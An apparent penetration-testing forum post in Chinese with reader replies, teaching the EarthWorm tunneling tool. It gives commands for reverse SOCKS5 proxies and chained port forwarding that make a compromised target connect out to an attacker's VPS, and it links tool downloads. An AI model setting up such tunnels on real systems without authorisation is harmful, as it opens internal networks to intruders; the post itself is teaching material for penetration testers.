用户
搜索
  • TA的每日心情

    2018-8-30 11:08
  • 签到天数: 105 天

    连续签到: 1 天

    [LV.6]常住居民II

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    29

    主题

    201

    帖子

    2277

    魔法币
    收听
    0
    粉丝
    13
    注册时间
    2016-7-25

    春秋文阁积极活跃奖i春秋签约作者i春秋推荐小组幽默灌水王春秋游侠

    发表于 2018-3-21 13:27:31 28885740
    本帖最后由 Aedoo 于 2018-3-21 13:32 编辑

    0x00 前言
    如果感觉本文对你有帮助,请在文章末尾点个赞,谢谢表哥们支持!
    当你在内网渗透,并且拿下一台机器的权限时,你是不是觉得已经算是一次完整的渗透了?
    不来一次内网漫游,渗透是不完整的,哈哈。
    1.png
    本文给大家推荐一款内网穿透神器EarthWorm,(简称EW)是一套轻量便携且功能强大的网络穿透工具,基于标准C开发,具有socks5代理、端口转发和端口映射三大功能。

    2.png

    它强在哪些方面呢?
    1.可穿透复杂的内网环境。(这么说吧:我本地连着路由器开一个虚拟机,可以直接反弹到公网的云服务器上。)
    2.以支持多平台间的转接通讯,Linux、Windows、MacOS、Arm-Linux均支持。

    支持平台列表:(可跨平台反弹)
    ew_for_Win.exe        适用各种Windows系统(X86指令集、X64指令集)        Windows7、Windows XP
    ew_for_Linux32        各常见Linux发行版 (X86 指令集 CPU)        Ubuntu(X86)/BT5(X86)
    ew_for_linux64        各常见Linux发行版 (X64 指令集 CPU)        Ubuntu(X64)/Kali(X64)
    ew_for_MacOSX64        MacOS系统发行版 (X64 指令集)        苹果PC电脑,苹果server
    ew_for_Arm32        常见Arm-Linux系统        HTC New One(Arm-Android)/小米路由器(R1D)
    ew_mipsel        常见Mips-Linux系统 (Mipsel指令集 CPU)        萤石硬盘录像机、小米mini路由器(R1CM)

    3.png

    0x01 使用方法

    以下所有样例,如无特殊说明代理端口均为1080,服务均为SOCKSv5代理服务.
    该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)。
    1.正向SOCKS v5服务器
    [Shell] 纯文本查看 复制代码
    $ ./ew -s ssocksd -l 1080

    2. 反弹 SOCKS v5 服务器
      这个操作具体分两步:
      a) 先在一台具有公网 ip 的主机A上运行以下命令:
      
    [Shell] 纯文本查看 复制代码
    $ ./ew -s rcsocks -l 1080 -e 8888 

      b) 在目标主机B上启动 SOCKS v5 服务 并反弹到公网主机的 8888端口
      
    [Shell] 纯文本查看 复制代码
    $ ./ew -s rssocks -d 1.1.1.1 -e 8888 

    成功。
    3. 多级级联
    工具中自带的三条端口转发指令,它们的参数格式分别为:
      
    [Shell] 纯文本查看 复制代码
    $ ./ew -s lcx_listen -l  1080   -e 8888
      $ ./ew -s lcx_tran   -l  1080   -f 2.2.2.3 -g 9999
      $ ./ew -s lcx_slave  -d 1.1.1.1 -e 8888    -f 2.2.2.3  -g  9999
    通过这些端口转发指令可以将处于网络深层的基于TCP的服务转发至根前,比如 SOCKS v5。
    首先提供两个“二级级联”本地SOCKS测试样例:
      a) lcx_tran 的用法
      
    [Shell] 纯文本查看 复制代码
    $ ./ew -s ssocksd  -l 9999
    $ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999
    b) lcx_listen、lcx_slave 的用法
    [Shell] 纯文本查看 复制代码
      $ ./ew -s lcx_listen -l 1080 -e 8888
      $ ./ew -s ssocksd    -l 9999
      $ ./ew -s lcx_slave  -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999

    再提供一个“三级级联”的本地SOCKS测试用例以供参考
    [Shell] 纯文本查看 复制代码
      $ ./ew -s rcsocks -l 1080 -e 8888
      $ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
      $ ./ew -s lcx_listen -l 9999 -e 7777
      $ ./ew -s rssocks -d 127.0.0.1 -e 7777

    数据流向: SOCKS v5 -> 1080 -> 8888 -> 9999 -> 7777 -> rssocks

    0x02 实战测试(分为本地测试和公网IP测试)
    一般最常用的就是上面的第二条:反弹 SOCKS v5 服务器。
    使用实例1:
    目标机器:
    [Shell] 纯文本查看 复制代码
    ew.exe -s rssocks -d 2.2.2.2 -e 888

    (2.2.2.2为想要反弹到的机器)
    攻击机器:
    [Shell] 纯文本查看 复制代码
    ew.exe -s rcsocks -l 1008 -e 888

    (监听888端口,转发到1008端口)
    测试环境:
    在这里我直接用我的本机Win10作为目标机器,将虚拟机Win7作为攻击机器。
    本机Win10 ip:192.168.62.1
    Win7 ip:192.168.62.128

    4.png

    5.png

    首先攻击机器win7运行命令:
    [Shell] 纯文本查看 复制代码
    ew_for_Win.exe -s rcsocks -l 1008 -e 888

    接收888端口的数据并转发到1008端口。

    6.png
    此时正在监听。

    目标机器Win10运行命令:
    [Shell] 纯文本查看 复制代码
    ew_for_Win.exe -s rssocks -d 192.168.62.128 -e 888

    7.png
    此时攻击机器会弹出连接成功的提示:
    8.png

    好了,到此Win10的SOCKS5代理就反弹到Win7攻击机上了。
    只需要一个Socks5连接工具就可以连接到本地1008端口来代理访问了。
    推荐工具SocksCap64。
    9.png

    在代理处配置127.0.0.1:1008
    代理已连接。
    使用实例2:
    攻击者洛杉矶 Linux VPS :45.78.*.*
    目标阿里云服务器 Win2008:47.93.*.*

    攻击者Linux监听:
    [Shell] 纯文本查看 复制代码
    [root@centos6 ~]# ./ew_for_Linux32 -s rcsocks -l 1008 -e 888

    10.png
    目标阿里云服务器反弹:
    [Shell] 纯文本查看 复制代码
    ew_for_Win.exe -s rssocks -d 45.78.*.* -e 888

    11.png
    攻击机器监听出现:rssocks cmd_socket OK!
    表示反弹成功。

    0x03 工具下载
    分别是EarthWorm和SocksCap64。
    http://rootkiter.com/EarthWorm/download/ew.zip
    http://sw.bos.baidu.com/sw-search-sp/software/b4a67d595e031/sockscap64w_V3.3_setup.exe





    本帖被以下淘专辑推荐:

    • · sc|主题: 64, 订阅: 3
    http://www.imsunshine.cn/
    发表于 2018-3-21 16:09:23
    错的怀疑人生 发表于 2018-3-21 15:11
    这样都是反向, 楼主有正向 之类的推荐吗? 就是内网那个pc 不能连接外网如何出来  ...

    先将代理反弹到你能拿下的可以链接外网的内网主机,再弹出来
    http://www.imsunshine.cn/
    使用道具 举报 回复
    发表于 2018-3-21 16:06:43
    错的怀疑人生 发表于 2018-3-21 15:11
    这样都是反向, 楼主有正向 之类的推荐吗? 就是内网那个pc 不能连接外网如何出来  ...

    你在渗透时不可能直接就拿下一台不连接外网的内网机器吧?
    http://www.imsunshine.cn/
    使用道具 举报 回复
    发表于 2018-3-21 14:24:14
    请教一个问题,渗透测试遇到一个主机,该主机不允许访问公网,只能和内网主机之间相互通讯,通过脚本来转发非常慢,而且经常出现问题,楼主有没有什么解决思路?
    使用道具 举报 回复
    这样都是反向, 楼主有正向 之类的推荐吗? 就是内网那个pc 不能连接外网如何出来 
    使用道具 举报 回复

    感谢分享               
    使用道具 举报 回复
    11212122222222222222222222222222222222222222222222222222222222
    使用道具 举报 回复


    加上网络拓扑图和一个流程图 或者总体的思维导图会更好一些
    使用道具 举报 回复

    加上网络拓扑图和一个流程图 或者总体的思维导图会更好一些
    使用道具 举报 回复
    发表于 2018-3-21 13:58:12
    哇哇哇,膜拜大佬
    使用道具 举报 回复
    发表于 2018-3-21 15:40:32
    学习一下
    使用道具 举报 回复
    发表于 2018-3-21 15:45:46
    表哥很识货,ew的确是个神器。
    ------在下名为菜逼,阁下请多指教。
    ------博客:www.jasonx.cc
    使用道具 举报 回复
    发表于 2018-3-21 15:56:46
    感谢分享
    使用道具 举报 回复
    发表于 2018-3-21 16:01:02
    哇哇哇,膜拜大佬
    使用道具 举报 回复
    发表于 2018-3-21 16:12:31
    舒舒服服
    使用道具 举报 回复
    诚殷网络论坛 安全团队 会是一回事,用又是一回事 i春秋认证 i春秋签约作者
    11#
    发表于 2018-3-21 16:19:06
    66666666666666666
    参加WEB安全培训,请滴滴我哟!或者联系邮箱:admin@chinacycc.com(只要君信我,定当不负君!)
    使用道具 举报 回复
    教程很详细!感谢大佬!
    使用道具 举报 回复
    感谢分享
    使用道具 举报 回复
    这个用过,也很流畅
    使用道具 举报 回复
    您需要登录后才可以回帖 登录 | 立即注册